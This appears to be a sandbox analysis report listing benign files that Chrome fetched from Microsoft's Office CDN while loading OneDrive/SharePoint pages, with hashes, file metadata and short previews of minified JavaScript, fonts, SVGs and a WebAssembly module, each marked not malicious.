                                                          Preview:/*! For license information please see 1941.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1941],{3259:function(e,t,n){"use strict";n.d(t,{a:function(){return p}});var a=n("react-lib"),i=n(115),r=n(114),o=n(200),s=n("fui.core_932"),c=n(145);const d=(0,s.lj6)({base:{Bt984gj:"f122n59",B7ck84d:"f1ewtqcl",mc9l5x:"f22iagw",Beiy3e4:"f1063pyq",Bh6795r:"fqerorx",qhf8xq:"f10pi13n",Bahqtrf:"fk6fouc",Be2twd7:"fy9rknc",Bhrd7zp:"figsok6",Bg96gwp:"fwrc4pm",fsow6f:"f17mccla",Bcvre1j:"fyl8oag",Br0sdwz:"f16vkdww",Bn78ew0:"fhsnbul",li1rpt:"f1gw3sf2",ap17g6:"f1ly5f7u",B771hl4:"f1s3tz6t"},childless:{susq4k:"f1kyqvp9",Bicfajf:["fzynn9s","f1z0ukd1"],jwcpgy:["fekrn8e","ftdg338"],B4rk6o:"fesgyo"},start:{Bsft5z2:"f13zj6fq"},center:{Ftih45:"f1wl9k8s",Bsft5z2:"f13zj6fq"},end:{Ftih45:"f1wl9k8s"},brand:{sj55zd:"f16muhyy",Bq4z7u6:"fcbuu2a",Bk5zm6e:["f1wdw2dr","f1ttio3w"],Bqjgrrk:"f1582fpk",Bm6vgfq:["f1ttio3w","f1wdw2dr"],B0n5ga8:"f1ahrvm8",s924m2:["f1cd3wbc","f17hbk9y"],B1q35kw:"
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (7031)
                                                          Category:downloaded
                                                          Size (bytes):7081
                                                          Entropy (8bit):5.446428079218659
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5AAA38B6EC78A6FFBF7B08CBFCC534E8
                                                          SHA1:B39F714E051DF5E66B4887B730E96668B956A40E
                                                          SHA-256:F9FFEE3EBFF3FBFA77880A710EDE85D76D0707D7C4D57EDCB2B1C2D416E54902
                                                          SHA-512:AA25CAE537EC1E91D3A1070496470B5A19AAF6D6FE69DFB83BB1317709FC243C179B5F0EC4DDF10D0CA47454E2A7872A7B7BD474447504CAAEE34AB70FD8CABC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/13.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[13],{3695:function(e,t,n){n.d(t,{a:function(){return v},b:function(){return S},c:function(){return D},d:function(){return y}});var a,i=n("tslib_538"),r=n(1995),o=n(808),s=n(506),c=n(62),d=n(2908),l=n(1917),u=n(3051),f=n("odsp.util_517"),p=n(2970),m=f.x9.isActivated("b7f49711-c56b-4749-a1bc-a91875390f45"),_=f.x9.isActivated("54b0c38f-b2dc-4be3-98ff-627ec8e4bdef"),h=((a={})[d.c.icon]={key:"type",index:0,isVisibleMobile:!0,isCollapsable:!1,type:l.a.FileIcon},a[d.c.name]={key:"name",index:1,isRowHeader:!0,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Name},a[d.c.title]={key:"Title",index:1,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Title},a[d.c.shareHeroCommand]={key:"_shareHeroCommand",index:2,isVisibleMobile:!1,isCollapsable:!0,minWidth:16,width:18,type:l.a.ShareCommand},a[d.c.calloutInvoker]={key:"_calloutInvoker",index:3,isVisibleM
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (52390)
                                                          Category:downloaded
                                                          Size (bytes):128027
                                                          Entropy (8bit):5.485963928835071
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:0B7E244328833856C3C1B6023803BB6A
                                                          SHA1:9FBAB1699D103F9CD6F73674527D0D8F3869E012
                                                          SHA-256:8EE733A20866C9E7B7A5AF117BE41766A75B22FC086B6A2BC2B234437F3442AC
                                                          SHA-512:BA3CEDDB526633AA30C64976124EF0DBE982351298F979B169F6F410B13F0F71F6B7E45A36994DD48ED78FE290761E07189B27B09C3182C6959FE4E6D7587CC8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/125.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[125],{1927:(e,t,n)=>{n.d(t,{a:()=>Pn});var a=n("tslib_538"),i=n(1),r=n(0),o=n(68),s=n(45),c=n(29),d=n(4),l=n(23),u=n(37),f=n(50),p=n(12),m=n(1414),_=n(225),h=n(968),b=n(973),g=n(1928),v=n(511),y=n(16),S=n(2644),D=n(751),I=n(463),x=n(2),C=n(49),O=n(392),w=n(79),E=n(253),A=n(505),L=n(246),k=n(65),M=n(982),P=n(7),T=n(221),U=n(134),F=n(972),H=n("fui.util_175");(0,H.ZW)([{rawString:"div.dropping_fbd73c6c{margin:-1px;border-width:1px;border-style:dashed;border-color:var(--ms-palette-themeTertiary)}div.hightLeftBorder_fbd73c6c{margin:-2px;border-left:2px solid var(--ms-palette-themeTertiary)}div.highRightBorder_fbd73c6c{margin:-2px;border-right:2px solid var(--ms-palette-themeTertiary)}"}]);const R="hightLeftBorder_fbd73c6c",N="highRightBorder_fbd73c6c";var B=n(380),j=n(510),V=n(8),z=n(11),G=n(509),K=n(255),W=n(969),q=n(1936),Q=n(512),Y=n("odsp.util_517"),J=n(643),X=n(120),Z=n(114),$={},ee=function(){function e(e,t)
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 27376, version 1.3277
                                                          Category:downloaded
                                                          Size (bytes):27376
                                                          Entropy (8bit):7.987457135814926
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5BF1A501ADFAA0CF7F2D438D74265457
                                                          SHA1:5F9B1F32D67239653D4A5BCD9A6511B06BE511EF
                                                          SHA-256:DFDCF6ABDA03D842FC0CAFC09FCFAA801B4F437D5E6EC5294EB64D8E80788990
                                                          SHA-512:6C09BFECCCF8067B8F360ADB32CD9F9CF74E2F9D7906B5EA8C5F804AB9501F36E60104DB307F78AE25972262ADD4B21F68826E7112036D87FDEDB85BCDE44078
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/odsp-next-icons-6109c629.woff
                                                          Preview:wOFF......j.................................OS/2.......G...`+Cw.cmap...P.......zh.V1gasp................glyf......_z...4..head..d....5...6#.hhea..d........$....hmtx..d.........0.'cloca..e.........uF..maxp..g ....... ...'name..g8.......O..R.post..j........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px..c....!...X <....N....x...ol.u.... .z.^.~.....0&...A..F.?1....13.C.t.S......l...b.91......&.`..........].z.k..4.:..Q.....<O.}.$..(j.ue..+...`......-....<.+.HxV}L..V.R?VG.Q5.Y...(3/..,x../. .....C!,.[....rX.wB....X......4.3..=..m...!..p.&.4.!C<.O.I9YGB..y..I.%}d.....gd....r.L.i.!...e..5NS.bm.V.......m..[{N.j{.....#.L_.o...[....g._....hM...;.Qd..]F...q.8k.F..1E.Vs..k....i.|....u...jk....h5YA.e..z..k.[.V...S..xI.+... >h{....n.....[s.p.N...3..pF...&.....c._...V..S.S.p..M........t..K'3......I.U.&k...../&..t....y.W...y..y...L..d.f..:L&~713...6.~.&..L~.'.E......U...)..2..Tv.......]r..@~.'. 6.Fy......L.ur=.(?..:..>'..)9.'.*.'/..e?..!|......x3....P..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):9278
                                                          Entropy (8bit):4.600246158513827
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:C711D55F5C2D3A41FD6A449CF44F5CED
                                                          SHA1:4FAFFF42F90AC7D2A4CCD99865CC8C188D6A9B09
                                                          SHA-256:EB50CA4BF56D418B745AD1C77A8B54B2138FB87A0A219E464EAE8CED4C949C87
                                                          SHA-512:9D97883DA54F78C683F2B1CAA8CDDF56D4F048CB287CDD2AC4691C553A15643CA1BE0CB06BCCEB54C319ACB7C52BC120E169A832FC1F660652ADC6B447068961
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_sharedwithme.svg
                                                          Preview:<svg id="GRAPHICS" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="208" height="208" viewBox="0 0 208 208"><defs><linearGradient id="linear-gradient" x1="94.855" y1="105.776" x2="94.855" y2="60.312" gradientUnits="userSpaceOnUse"><stop offset="0.002" stop-color="#f5b453"/><stop offset="0.295" stop-color="#fed494"/></linearGradient><linearGradient id="linear-gradient-2" x1="78.418" y1="193.452" x2="112.154" y2="135.018" gradientUnits="userSpaceOnUse"><stop offset="0.002" stop-color="#f5b453"/><stop offset="0.581" stop-color="#fed494"/></linearGradient><radialGradient id="radial-gradient" cx="798.044" cy="19.099" r="19.648" gradientTransform="matrix(0.998, 0.068, -0.069, 1.006, -705.89, 6.156)" gradientUnits="userSpaceOnUse"><stop offset="0.338" stop-color="#797673"/><stop offset="0.513" stop-color="#979592"/><stop offset="0.701" stop-color="#b1afac"/><stop offset="0.869" stop-color="#c1bebc"/><stop offset="1" stop-color="#c6c4c2"/></radialGradient></
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                          Category:dropped
                                                          Size (bytes):5434698
                                                          Entropy (8bit):6.522510502524978
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BCEDB07B0CEA5C63DAA1A48EB2FB5EEF
                                                          SHA1:D745948BF38C9F5C9F2B56E05DC7E71C8DEB6505
                                                          SHA-256:0652103E816224D89584D67CA52E1EF8DF71CD5DED269D744D49FAA46CF33824
                                                          SHA-512:E654C62DFB37F999E49E6192B1D226BEF1CB4E2A4ACD20ADD27DBE386B072DDFAF22870443CD8B319D84A8A7F24AF39A224B8886D12C8B7F7BC0CDFBDCA2A6E2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.asm.........`...`....`....`.....`.....`......`.......`...`......`.......`........`...}`........`.........`...~`...........`.........`..........`..~...`..}.`..`....}`...~..`............`...........`..~..`...~...`..........`....~.`.}.}`.....}..`.............`..~..~`...|`....}..`.|.|`..}..`.|...`.~...`..~~~~.`..~.`..}}.`.....}`..~~.....`..~..`...}..`..}}...`............`.||.|`.}}..`.....~..`..............`.|..`.~..`.~..~`...||||.`.}}.}`......~`.....|..`.}..`....}.`....}...........`......}..`....}...`..}}}}.`...............`..~~..`....|`...............`.....~~..`......~~..`..}.}`..|..`.....}....`.....}.`..}}..`...|.|`...}.`...}......`..}}}}}}.`.}}}}.`..|`.|..|`..|......`..|.`....~`..~`.................`..~~~...`.|.}`.}...`...}}.`...}..`...}.}`...}}...`....|...`..}}....`...}..........`....}......`.......|`.~~.|`.||..`..||..`..||.`....~.~`.~~.}`.~~~~..`.~~~..`...~.`.....|`..|.|`.|.`..~~...`...~..`.~.`....~..`......~.`..}}.}.`....}.....`....}.........`..}}}}}}}}..`..}..`....}.}}.`.....}}}..}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (19649)
                                                          Category:downloaded
                                                          Size (bytes):101523
                                                          Entropy (8bit):5.308012464287448
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B1B3A894BF261BF4553AE5387786E640
                                                          SHA1:110B6D518EDAA6A9AFE7CBBB5C3AD80A243C73D6
                                                          SHA-256:163764BB5E1940FD8BCA2932253C6C9EB1732247BA7A8EA5EB5AA56863D95542
                                                          SHA-512:B7EDC944A7374C1F9EC62D484FB36BB5FDE2018F5E2FCB993731828D6DE333D443351C12BACAB46F1458E184DD2FDC9C75E8A95271DFA6F3CA3D3230997C6BD3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/87072.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[87072],{465375:(e,t,n)=>{n.d(t,{s:()=>r});var a=n(620335),i=n(174130);function r(e,t,n){var r=(0,a.w)(e,function(e){return t===e||e.hasAttribute(i.r)},n);return null!==r&&r.hasAttribute(i.r)}}.,727273:(e,t,n)=>{n.d(t,{R:()=>T});var a,i=n(171125),r=n(539155),o=n(111602),s=n(260928),c=n(328699),d=n(626605),l=n(953790),u=n(679851),f=n(426707),p=n(495012),m=n(257603),_=n(373992),h=n(74334),b=n(599116),g=n(465375),v=n(936175),y=n(586443),S=n(74889),D="data-is-focusable",I="data-focuszone-id",x="tabindex",C="data-no-vertical-wrap",O="data-no-horizontal-wrap",w=999999999,E=-999999999;function A(e,t){var n;"function"==typeof MouseEvent?n=new MouseEvent("click",{ctrlKey:null==t?void 0:t.ctrlKey,metaKey:null==t?void 0:t.metaKey,shiftKey:null==t?void 0:t.shiftKey,altKey:null==t?void 0:t.altKey,bubbles:null==t?void 0:t.bubbles,cancelable:null==t?void 0:t.cancelable}):(n=document.createEvent("MouseEvents
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):19403
                                                          Entropy (8bit):4.185434199284073
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:39A94ED0951601969B638ED1CC945A1D
                                                          SHA1:AA8EA3137FB98F0390B598E68F1DE78E191552EC
                                                          SHA-256:6B1B621F82EC75D0DB1538C7725B67D303C8670084E1ABB01D84C7A4CFF3CAC3
                                                          SHA-512:04DF7063C6AB8BB8DAB9E304054AC94ED7E932E9FA84473F74A45B034A5C6852C32E6F5E02CC2DEE8030CAC89A92FDDC09543A9A8A7EE401348D1EE57F383A92
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_sharedbyme_dark.svg
                                                          Preview:<svg width="220" height="222" viewBox="0 0 220 222" fill="none" xmlns="http://www.w3.org/2000/svg">..<path opacity="0.2" d="M184.395 186.005C229.419 157.416 217.516 110.412 197.766 70.3088C191.115 56.8041 192.668 31.8932 180.134 22.2853C155.094 3.08652 137.077 8.57249 122.146 26.4808C115.515 34.4355 102.273 41.9194 86.9565 36.7996C71.64 31.6797 22.873 31.6989 51.7818 90.6228C72.0567 131.944 41.4524 130.02 19.72 145.87C-1.62315 161.434 24.5621 193.375 50.3931 202.514C81.6088 213.56 155.576 204.305 184.395 186.005Z" fill="#797673"/>..<path d="M112.036 47.0791L7.40295 66.9566C7.0264 67.0283 6.68062 67.2146 6.41216 67.4905C6.14371 67.7664 5.96545 68.1187 5.90139 68.4999C5.83733 68.8811 5.89054 69.273 6.05386 69.6228C6.21718 69.9726 6.48276 70.2635 6.81487 70.4563L20.6029 78.4612L112.036 47.0791Z" fill="#EDD3B0"/>..<path d="M31.3711 105.97L46.4711 94.945L34.3304 87.4902L31.3711 105.97Z" fill="url(#paint0_linear_1003_115095)"/>..<path d="M34.3242 87.4946L46.4655 94.9487L61.2234 104.009C61.99
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (30298)
                                                          Category:dropped
                                                          Size (bytes):139042
                                                          Entropy (8bit):5.381534294781151
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:67AE62B25FB4082FC2AEF65A28E481B3
                                                          SHA1:FC2838CC91648483E1060392C4A0F96EF6CE9CFC
                                                          SHA-256:FD559BCB811BD66C3E62915F722F69814CEB2C49F6121D9CF718914468E7FFD7
                                                          SHA-512:279757B5C65078502A409C3671570385C6A83055ED8588E86B3D2AC0495264EC35A1DA44656CCE12CF82CCE19DE9DCC5582A9BCA5540B266A0E5DAA92B96BAB6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_mast_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["mast"],{69691:function(n,t,e){var r=e(92855),i=e(41230),o=e(54800),u=e(59177),a=e(68128),c=e(78939),s=e(85788),l=e(69988),f=e(25855),d=function(n){function t(){var e=n.call(this)||this;return e.pluginVersionStringArr=[],(0,i.A)(t,e,(function(n,t){n.logger&&n.logger.queue||(n.logger=new o.wq({loggingLevelConsole:1})),n.initialize=function(e,r,i,s){(0,u.r2)(n,(function(){return"AppInsightsCore.initialize"}),(function(){var u=n.pluginVersionStringArr;if(e){e.endpointUrl||(e.endpointUrl=l.S);var f=e.propertyStorageOverride;!f||f.getProperty&&f.setProperty||(0,a.$8)("Invalid property storage override passed."),e.channels&&(0,a.Iu)(e.channels,(function(n){n&&(0,a.Iu)(n,(function(n){i
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):7886
                                                          Entropy (8bit):3.1280056112498884
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:604ADFB53677B5CA4F910FFB131B3E7C
                                                          SHA1:5F1A0FB4E4AD3707E591CE16352158263488ED70
                                                          SHA-256:24638331466A52BB66F912090E7A9CC9E3DF2236E39C187C9409104526B472B0
                                                          SHA-512:35F618F42ADFEE6D1335C67F729C298789419FE2930371A91683F60481794488DFAF15B572E6FC1BE70833EF12DFE57432725F6336B6B73DCFB52596F57F30A5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(`.(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(p.....................
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (11267)
                                                          Category:downloaded
                                                          Size (bytes):14407
                                                          Entropy (8bit):5.315809076022514
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:AC10BC52777810D2DB902248F5B5DB1F
                                                          SHA1:598A60E7577639F4D957BDCFEEF9C961E86097B6
                                                          SHA-256:593C3F7C932FA222845498AAC455AB14ED71BC280B8C38274C064917562849B3
                                                          SHA-512:D46311BD0AAF34896B38FCC56DCE2792894E3356C9A4FE64201143D72D45850272AF48CA1CD5607F9DF922B08BFA5036BF6EF12CD127F1EA68D4C41F675FE29E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/1.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1],{6220:function(e,t,n){n.d(t,{a:function(){return U}});var a=n("tslib_538"),i=n("react-lib"),r=n(29),o=n(375),s=n("fui.util_175"),c=n(284),d=n("fui.core_932"),l=n(1059),u=n(8650),f=n(2862),p=n(327),m=n(1787),_=n(1783),h=n(198),b=n(138),g=n(82),v=(0,s.e_)(function(e,t){return{root:(0,s.ZC)(e,t&&{touchAction:"none",selectors:{"& *":{userSelect:"none"}}})}}),y=n(543),S=n(151),D=n(285),I={start:"touchstart",move:"touchmove",stop:"touchend"},x={start:"mousedown",move:"mousemove",stop:"mouseup"},C=function(e){function t(t){var n=e.call(this,t)||this;return n._currentEventType=x,n._events=[],n._onMouseDown=function(e){var t=i.Children.only(n.props.children).props.onMouseDown;return t&&t(e),n._currentEventType=x,n._onDragStart(e)},n._onMouseUp=function(e){var t=i.Children.only(n.props.children).props.onMouseUp;return t&&t(e),n._currentEventType=x,n._onDragStop(e)},n._onTouchStart=function(e){var t=i.Children.only(n
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (45506)
                                                          Category:dropped
                                                          Size (bytes):45536
                                                          Entropy (8bit):5.396374190413754
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BC512A357F61AF262D53F5156E3D141C
                                                          SHA1:1DCB28E3F469109C4D7BACF454BB6DCE3D8F51B7
                                                          SHA-256:ECAF4B7E1E2D97E4E9D9D17BEB388C5E9302B0D65E1888C2520C698E817B25DE
                                                          SHA-512:F8263DAFA71B6D41DB0CB42EA330A5F7EA6D9E87EB999CEEC00E7311D2F22800E057EA2972F70819F79E95959343E6DBC969DE7A80DDA92AB7592BEF5C85EB65
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.util"],{"fui.util_175":(e,t,n)=>{n.d(t,{ey:()=>Wt,Vs:()=>Te,ws:()=>d,gt:()=>_e,p6:()=>s,rf:()=>xe,vv:()=>o,M0:()=>Kt,OQ:()=>Rt,N7:()=>vn,U8:()=>R,Kw:()=>N,xP:()=>we,Ac:()=>At,pc:()=>Et,jr:()=>B,I8:()=>_,_r:()=>H,LC:()=>F,IV:()=>Pt,DG:()=>Ut,ck:()=>Tt,h6:()=>v,Wb:()=>tt,cQ:()=>J,eq:()=>Bt,PX:()=>ae,pz:()=>Qe,_m:()=>ze,A1:()=>Ge,tk:()=>ne,uV:()=>An,es:()=>Ce,$O:()=>gn,P9:()=>Je,Ud:()=>fn,z9:()=>Xt,R1:()=>Zt,wx:()=>dt,GG:()=>jt,T3:()=>Jt,JZ:()=>Ke,G8:()=>_n,cC:()=>an,CN:()=>Z,Cg:()=>Mt,D7:()=>ie,k3:()=>bn,Dg:()=>Ht,$L:()=>$t,tU:()=>tn,wz:()=>hn,M3:()=>wt,pv:()=>gt,hA:()=>ce,I2:()=>le,bS:()=>pe,Sw:()=>en,hZ:()=>nn,jx:()=>on,iR:()=>Yt,x5:()=>rn,vA:()=>u,n0:()=>De,P4:()=>f,kF:()=>at,$1:()=>D,TM:()=>Qt,wH:()=>se,Z2:()=>kt,IZ:()=>nt,Nv:()=>un,F$:()=>ln,cW:()=>dn,QT:()=>cn,Nx:()=>sn,A2:()=>qt,Eg:()=>S,ZW:()=>Ve,i4:()=>qe,fK:()=>ot,Uu:()=>Se,EA:()=>Vt,e_:()=>En,pZ:()=>wn,Rs:()=>ut,ZC:()=>lt,MP:()=>Ie,fB:()=>ve,Rf:
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2626)
                                                          Category:downloaded
                                                          Size (bytes):5432
                                                          Entropy (8bit):5.137777653711057
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:AF0D66ABCCC0655461D8E63E8B279DEC
                                                          SHA1:BB078C9BD504A9062A57102AE667999337494E83
                                                          SHA-256:64EEE421A6466CA88F684880656A31864DF352ADC9976889A2A31D0FE873DA34
                                                          SHA-512:5CCA7AA3F0AD05FC0595791372F0B8E6D1713596EEDBE26120515220FCDDAD001654325CFEC24D45AE297308A4E75126F50F905FFD0486D754FBD7EA1055DE9F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/custom-formatter/en-us/custom-formatter.lib.resx-e9834343.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["custom-formatter.lib.resx"],{cfmt_588:function(e){e.exports=JSON.parse('{"vb":"Not submitted","Wb":"Requested","pS":"Rejected","EJ":"Approved"}')}.,cfmt_233:function(e){e.exports=JSON.parse('{"EJ":"Approved","Dk":"Rejected","Wb":"Pending","F4":"Draft","nX":"Scheduled"}')}.,cfmt_350:function(e){e.exports=JSON.parse('{"elmTypeMissing":"Must specify elmType.","elmTypeInvalid":"Invalid elmType: {0}. Must be one of {1}.","operatorMissing":"Missing operator in expression: {0}.","operatorInvalid":"\\u0027{0}\\u0027 is not a valid operator. It must be one of {1} in the expression {2}.","operandMissing":"There must be at least 1 operand in the expression {0}.","operandNOnly":"Expecting {0} operand(s) for the expression {1}.","operandInvalid":"Invalid operands are passed to the function","nan":"{0} is not a number. Number expected in the expression {1}.","notArray":"{0} is not an array, array expected in the expressio
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (29492)
                                                          Category:downloaded
                                                          Size (bytes):35528
                                                          Entropy (8bit):5.323185341635309
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BF6C1765C8F1B99C38B8E26208977C45
                                                          SHA1:832D2378B61E742D32E7736C3D3A63595DF89AFE
                                                          SHA-256:08730A30E49C589180A5AE862CC9922FB7CCFFCF0847C6E8DAD4A4823A22689B
                                                          SHA-512:9EDF8DCF89EA52C94BD2E29A8A0CCCC2774846ACBB72CDF0A4E22736F85C4555DCE48E454B4F078B1E480D887C45397E4A5A8E6919A6426A85E4ED01D01DCD8C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/49.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[49],{8708:function(e,t,n){n.d(t,{a:function(){return F},b:function(){return H}});var a=n("tslib_538"),i=n(3238),r=n(268),o=n(876),s=n(913),c=n(2912),d=n(4410),l=n(3427),u=n(3426),f=n(3321),p=n(3055),m=n(3320),_=n(3428),h=n(3717),b=n(3429),g=n(334),v=n(267),y=n(4026),S=n(2908),D=n(55),I=n(1815),x=n("odsp.util_517"),C=n(1821),O=n(3318),w=n(230),E=n(3319),A=!x.x9.isActivated("48d0bf6b-2e41-42a8-a3a3-e8d2ef405dbb","7/14/2022","better error handling"),L=x.x9.isActivated("3e85cd31-2807-44c1-96bf-35f08619ec11","1/31/2023","Fix for not appending navId to SPL link"),k=x.x9.isActivated("edb05947-5f5b-47a0-91ef-ddc0cef4e7a1","07/03/2024","sbarrameda: fix to use loginName if userId is undefined"),M=x.x9.isActivated("46a06a91-966f-47f1-af68-09d8b3864e12","07/03/2023","Override navId with navIdSendLinkOverride")||x.az.isFeatureEnabled({ECS:1107386}),P=x.x9.isActivated("62a4337e-d21e-407b-b2ef-2163777d20b8","12/19/2022","Li
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (63604)
                                                          Category:dropped
                                                          Size (bytes):130560
                                                          Entropy (8bit):5.272245687496742
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:ACDFECB80B06F30C59B48F9B2140E6F5
                                                          SHA1:C46873F855BDABF9943DA278813B53B4DD6FB6D6
                                                          SHA-256:CA46523D06A57712685B5C6B01430B530FE76F8FD5803179FCAA3466770E93A0
                                                          SHA-512:9BD579F55596F100C7A3723AE2345F3C43785BAF0576BFB5060F495FC8B7CCA3BD9FB43EA71B6F39FB68DFA82B80239A862E8186AD2956F2D4DFE1C971BEF293
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*! For license information please see odsp.react.lib-9ea4d016.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.react.lib"],{react_340:function(e){"use strict";var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;function i(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach(function(e){a[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,s,c=i(e),d=1;d<arguments.length;d++){for(var l in o=Object(arguments[d]))n.ca
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 13164, version 1.3277
                                                          Category:downloaded
                                                          Size (bytes):13164
                                                          Entropy (8bit):7.966401667846051
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:882E5D4CC9F7106331B0DC45753D36C1
                                                          SHA1:0605E0D0CECA0F29A2D032185F74BF07E5C55252
                                                          SHA-256:0611DC6778BFBD8D581CF1031D2888D822AB0F513C91EEBEC0801072D311A97B
                                                          SHA-512:9D2F247A8A6B0D1F6A68EF9C49C894F19A07A1D59638B40F84A3C0FD95A6A518572A36F5996F795AF4C03919EADF4832A8CBB804F5060E4EBD623F9FD194F449
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/odsp-next-icons-10-71daa628.woff
